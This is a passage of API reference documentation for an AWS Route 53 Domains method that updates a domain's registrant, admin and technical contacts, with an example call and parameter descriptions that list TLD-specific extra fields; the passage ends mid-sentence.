This operation updates the contact information for a particular domain. You must specify information for at least one contact: registrant, administrator, or technical.
If the update is successful, this method returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.update_domain_contact(
DomainName='string',
AdminContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
RegistrantContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
TechContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
}
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to update contact information for.\n
:type AdminContact: dict
:param AdminContact: Provides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type RegistrantContact: dict
:param RegistrantContact: Provides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with legal residence)\nOTHER (For contacts outside of Spain)\n\n\nES_LEGAL_FORM Valid values include the following:\nASSOCIATION\nCENTRAL_GOVERNMENT_BODY\nCIVIL_SOCIETY\nCOMMUNITY_OF_OWNERS\nCOMMUNITY_PROPERTY\nCONSULATE\nCOOPERATIVE\nDESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL\nECONOMIC_INTEREST_GROUP\nEMBASSY\nENTITY_MANAGING_NATURAL_AREAS\nFARM_PARTNERSHIP\nFOUNDATION\nGENERAL_AND_LIMITED_PARTNERSHIP\nGENERAL_PARTNERSHIP\nINDIVIDUAL\nLIMITED_COMPANY\nLOCAL_AUTHORITY\nLOCAL_PUBLIC_ENTITY\nMUTUAL_INSURANCE_COMPANY\nNATIONAL_PUBLIC_ENTITY\nORDER_OR_RELIGIOUS_INSTITUTION\nOTHERS (Only for contacts outside of Spain)\nPOLITICAL_PARTY\nPROFESSIONAL_ASSOCIATION\nPUBLIC_LAW_ASSOCIATION\nPUBLIC_LIMITED_COMPANY\nREGIONAL_GOVERNMENT_BODY\nREGIONAL_PUBLIC_ENTITY\nSAVINGS_BANK\nSPANISH_OFFICE\nSPORTS_ASSOCIATION\nSPORTS_FEDERATION\nSPORTS_LIMITED_COMPANY\nTEMPORARY_ALLIANCE_OF_ENTERPRISES\nTRADE_UNION\nWORKER_OWNED_COMPANY\nWORKER_OWNED_LIMITED_COMPANY\n\n.fi\n\nBIRTH_DATE_IN_YYYY_MM_DD\nFI_BUSINESS_NUMBER\nFI_ID_NUMBER\nFI_NATIONALITY Valid values include the following:\nFINNISH\nNOT_FINNISH\n\n\nFI_ORGANIZATION_TYPE Valid values include the following:\nCOMPANY\nCORPORATION\nGOVERNMENT\nINSTITUTION\nPOLITICAL_PARTY\nPUBLIC_COMMUNITY\nTOWNSHIP\n\n.fr\n\nBIRTH_CITY\nBIRTH_COUNTRY\nBIRTH_DATE_IN_YYYY_MM_DD\nBIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .\nBRAND_NUMBER.it\n\nIT_NATIONALITY\nIT_PIN\nIT_REGISTRANT_ENTITY_TYPE Valid values include the following:\nFOREIGNERS\nFREELANCE_WORKERS (Freelance workers and professionals)\nITALIAN_COMPANIES (Italian companies and one-person companies)\nNON_PROFIT_ORGANIZATIONS\nOTHER_SUBJECTS\nPUBLIC_ORGANIZATIONS\n\n.ru\n\nBIRTH_DATE_IN_YYYY_MM_DD\nRU_PASSPORT_DATA.se\n\nBIRTH_COUNTRY\nSE_ID_NUMBER.sg\n\nSG_ID_NUMBER.co.uk, .me.uk, and .org.uk\n\nUK_CONTACT_TYPE Valid values include the following:\nCRC (UK Corporation by Royal Charter)\nFCORP (Non-UK Corporation)\nFIND (Non-UK Individual, representing self)\nFOTHER (Non-UK Entity that does not fit into any other category)\nGOV (UK Government Body)\nIND (UK Individual (representing self))\nIP (UK Industrial/Provident Registered Company)\nLLP (UK Limited Liability Partnership)\nLTD (UK Limited Company)\nOTHER (UK Entity that does not fit into any other category)\nPLC (UK Public Limited Company)\nPTNR (UK Partnership)\nRCHAR (UK Registered Charity)\nSCH (UK School)\nSTAT (UK Statutory Body)\nSTRA (UK Sole Trader)\n\n\nUK_COMPANY_NUMBER\n\nIn addition, many TLDs require a VAT_NUMBER .\n\nValue (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.\n\n\n\n\n\n\n
:type TechContact: dict
:param TechContact: Provides detailed contact information.\n\nFirstName (string) --First name of contact.\n\nLastName (string) --Last name of contact.\n\nContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:\n\nIf you specify a value other than PERSON , you must also specify a value for OrganizationName .\nFor some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide\nFor .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .\n\n\nOrganizationName (string) --Name of the organization for contact types other than PERSON .\n\nAddressLine1 (string) --First line of the contact\'s address.\n\nAddressLine2 (string) --Second line of contact\'s address, if any.\n\nCity (string) --The city of the contact\'s address.\n\nState (string) --The state or province of the contact\'s city.\n\nCountryCode (string) --Code for the country of the contact\'s address.\n\nZipCode (string) --The zip or postal code of the contact\'s address.\n\nPhoneNumber (string) --The phone number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code>]'. For example, a US phone number might appear as '+1.1234567890' .\n\nEmail (string) --Email address of the contact.\n\nFax (string) --Fax number of the contact.\nConstraints: Phone number must be specified in the format '+[country dialing code].[number including any area code]'. For example, a US phone number might appear as '+1.1234567890' .\n\nExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.\n\n(dict) --ExtraParam includes the following elements.\n\nName (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:\n\n.com.au and .net.au\n\nAU_ID_NUMBER\nAU_ID_TYPE Valid values include the following:\nABN (Australian business number)\nACN (Australian company number)\nTM (Trademark number)\n\n.ca\n\nBRAND_NUMBER\nCA_BUSINESS_ENTITY_TYPE Valid values include the following:\nBANK (Bank)\nCOMMERCIAL_COMPANY (Commercial company)\nCOMPANY (Company)\nCOOPERATION (Cooperation)\nCOOPERATIVE (Cooperative)\nCOOPRIX (Cooprix)\nCORP (Corporation)\nCREDIT_UNION (Credit union)\nFOMIA (Federation of mutual insurance associations)\nINC (Incorporated)\nLTD (Limited)\nLTEE (Limit\xc3\xa9e)\nLLC (Limited liability corporation)\nLLP (Limited liability partnership)\nLTE (Lte.)\nMBA (Mutual benefit association)\nMIC (Mutual insurance company)\nNFP (Not-for-profit corporation)\nSA (S.A.)\nSAVINGS_COMPANY (Savings company)\nSAVINGS_UNION (Savings union)\nSARL (Soci\xc3\xa9t\xc3\xa9 \xc3\xa0 responsabilit\xc3\xa9 limit\xc3\xa9e)\nTRUST (Trust)\nULC (Unlimited liability corporation)\n\n\nCA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:\nABO (Aboriginal Peoples indigenous to Canada)\nCCT (Canadian citizen)\nLGR (Legal Representative of a Canadian Citizen or Permanent Resident)\nRES (Permanent resident of Canada)\n\n\n\nWhen ContactType is a value other than PERSON , valid values include the following:\n\n\nASS (Canadian unincorporated association)\nCCO (Canadian corporation)\nEDU (Canadian educational institution)\nGOV (Government or government entity in Canada)\nHOP (Canadian Hospital)\nINB (Indian Band recognized by the Indian Act of Canada)\nLAM (Canadian Library, Archive, or Museum)\nMAJ (Her/His Majesty the Queen/King)\nOMK (Official mark registered in Canada)\nPLT (Canadian Political Party)\nPRT (Partnership Registered in Canada)\nTDM (Trademark registered in Canada)\nTRD (Canadian Trade Union)\nTRS (Trust established in Canada)\n\n.es\n\n\nES_IDENTIFICATION Specify the applicable value:\nFor contacts inside Spain: Enter your passport ID.\nFor contacts outside of Spain: Enter the VAT identification number for the company.\n\n\nNote\nFor .es domains, the value of ContactType must be PERSON .\n\n\nES_IDENTIFICATION_TYPE Valid values include the following:\nDNI_AND_NIF (For Spanish contacts)\nNIE (For foreigners with 